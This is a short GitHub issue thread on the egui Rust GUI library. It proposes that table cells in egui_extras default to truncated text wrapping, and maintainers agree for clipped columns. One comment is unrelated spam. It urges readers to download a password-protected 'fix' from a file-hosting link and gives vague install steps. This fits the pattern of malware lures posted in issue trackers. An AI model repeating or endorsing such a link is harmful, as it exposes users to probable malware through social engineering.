### ISSUE TITLE
`egui_extras::TableRow`: the `col` method should default the `Ui`'s text wrap to `Truncate`

### ISSUE THREAD

**Issue by abey79** [emilk/egui#5013]
We almost always want the cell text to truncate in tables. ` TableRow` should thus pre-configure the `Ui` accordingly.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by emilk** [comment]
I think this makes sense, but only for columns with clipping turned on 🤔

**Comment by abey79** [comment]
Agreed
